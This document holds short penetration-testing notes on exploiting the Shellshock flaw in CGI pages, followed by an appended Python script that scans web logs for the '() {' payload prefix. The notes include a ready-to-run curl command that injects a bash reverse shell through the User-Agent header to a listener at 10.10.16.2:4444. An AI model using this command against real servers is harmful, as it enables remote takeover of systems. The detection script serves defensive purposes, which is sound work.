CGI
shellshock
(step 1) - Testing for shellshock: most tests echo a known string and expect that string to be returned in the web response. If you think a page may be vulnerable, search for all the CGI pages and test them.
(step 2) - PoC that we have RCE (you could also make a ping or web request to yourself and monitor that with tcpdump)
(step 3) - Reverse shell
curl -k -H 'User-Agent: () { :; }; /bin/bash -c "exec bash -i &>/dev/tcp/10.10.16.2/4444 <&1"' http://$IP/cgi-bin/test.cgi
other
reflected
Out-Of-Band
Use the Cookie header as an alternative to User-Agent
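Detection side of the notes above, as an added example that is not part of the original page: a log check that flags the "() {" function-definition prefix in the User-Agent, Cookie or Referer header. The log format (Apache combined with the Cookie header appended as a last quoted field), the function name find_shellshock and the sample lines are assumptions constructed for illustration.

```python
import re

# Function-definition prefix used by the page's payloads: "() {".
# Whitespace between the tokens is tolerated to catch trivial variations.
SHELLSHOCK_RE = re.compile(r"\(\s*\)\s*\{")

# Assumed log format (not from the page): Apache "combined" with the Cookie
# header appended as a final quoted field. Apache writes a literal quote
# inside a logged header as \" so quoted fields accept backslash escapes.
QUOTED = r'"((?:[^"\\]|\\.)*)"'
LINE_RE = re.compile(
    r'^(\S+) \S+ \S+ \[[^\]]+\] ' + QUOTED + r' (\d{3}) \S+ '
    + QUOTED + " " + QUOTED + " " + QUOTED + r"$"
)
HEADER_NAMES = ("Referer", "User-Agent", "Cookie")

# Constructed sample lines (documentation IP ranges, harmless echo markers).
SAMPLE_LOG = [
    r'192.0.2.10 - - [01/Jan/2024:10:00:00 +0000] "GET /index.html HTTP/1.1" 200 512 "-" "Mozilla/5.0" "-"',
    r'198.51.100.7 - - [01/Jan/2024:10:00:05 +0000] "GET /cgi-bin/test.cgi HTTP/1.1" 200 64 "-" "() { :; }; echo; echo \"CONSTRUCTED\"" "-"',
    r'198.51.100.7 - - [01/Jan/2024:10:00:09 +0000] "GET /cgi-bin/test.cgi HTTP/1.1" 500 0 "-" "curl/8.0" "() { :;}; echo; echo CONSTRUCTED"',
    r'192.0.2.33 - - [01/Jan/2024:10:00:12 +0000] "GET /docs?q=f() HTTP/1.1" 200 90 "-" "Mozilla/5.0" "lang=en"',
]


def find_shellshock(lines):
    """Return (source, request, status, header) for every header with '() {'."""
    hits = []
    for line in lines:
        m = LINE_RE.match(line.strip())
        if not m:
            continue  # line is not in the assumed format
        src, request, status, *headers = m.groups()
        for name, value in zip(HEADER_NAMES, headers):
            if SHELLSHOCK_RE.search(value):
                hits.append((src, request, status, name))
    return hits


if __name__ == "__main__":
    for src, request, status, header in find_shellshock(SAMPLE_LOG):
        print(f"{src} {status} {request!r}: function definition in {header}")
```

Only header fields are scanned, so the "f()" in the last sample's query string is not flagged; the Cookie field is only available if the server is configured to log it.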